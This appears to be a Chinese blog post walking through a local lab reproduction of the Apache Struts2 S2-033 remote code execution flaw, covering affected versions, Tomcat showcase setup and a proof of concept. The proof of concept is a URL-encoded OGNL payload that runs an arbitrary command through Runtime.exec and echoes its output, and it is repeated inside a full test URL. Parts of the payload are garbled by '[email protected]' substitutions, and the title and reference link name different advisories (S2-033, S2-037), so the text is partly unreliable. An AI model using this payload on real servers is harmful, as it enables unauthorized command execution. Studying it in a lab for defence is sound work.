Struts-S2-033漏洞利用（含环境搭建、含POC）

Struts-02-033

此文仅供大家交流学习，严禁非法使用

一、参考网址：

http://wps2015.org/drops/drops/PKAV%20%E5%8F%91%E7%8E%B0%20Struts2%20%E6%9C%80%E6%96%B0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88S2-037%EF%BC%89.html

二、 影响版本：

Struts 2.3.20 - Struts Struts 2.3.28（2.3.20.3和2.3.24.3除外）

三、 漏洞介绍：

当使用REST插件启用动态方法调用时，可以传递可用于在服务器端执行任意代码的恶意表达式。

四、 环境搭建：

• 参考网址：
  http://netsecurity.51cto.com/art/201707/544837.htm

• 下载/struts/2.3.24

下载地址：http://archive.apache.org/dist/struts/2.3.24/
百度云链接：链接：http://pan.baidu.com/s/1dFeUyNv 密码：279t

• 下载安装xampp

• 部署showcase

1.png

• 解压

2.png

• 复制到

3.png

重启tomcat

4.png

• 已成功自动部署

5.png

• 访问http://127.0.0.1:8080/struts2-showcase/index.action

• 搭建完毕，打开http://127.0.0.1:8080/struts2-rest-showcase/orders/3

五、 POC:

!%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23process%[email protected]@getRuntime%28%29.exec%28%23parameters.command[0]),%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%2C%23ros.flush%28%29,%23xx%3d123,%23xx.toString.json?&command=ipconfig

六、 测试网址：

原始网址：

http://127.0.0.1:8080/struts2-rest-showcase/orders/3

更改之后网址：

http://127.0.0.1:8080/struts2-rest-showcase/orders/3!%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23process%[email protected]@getRuntime%28%29.exec%28%23parameters.command[0]),%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%2C%23ros.flush%28%29,%23xx%3d123,%23xx.toString.json?&command=ipconfig

七、执行结果

2.png

八、 存在问题

首先实在github上使用该漏洞的docker镜像，结果发现并不能使用，不知道是技术问题还是镜像问题。然后自己搭建环境，根据S2-033的前提去搭建环境，返现struts.xml里并没有struts.enable.DynamicMethodInvocation这一项，然后我就手动添加进去，重启tomcat，重新输入POC，漏洞就成功验证了

九、 至此，该漏洞基本利用完毕

本人还是一个未毕业的小萌新，希望大家多多帮助，有问题请发送邮件到[email protected]不胜感激，我也会尽量去帮助大家

坚决做一名白帽子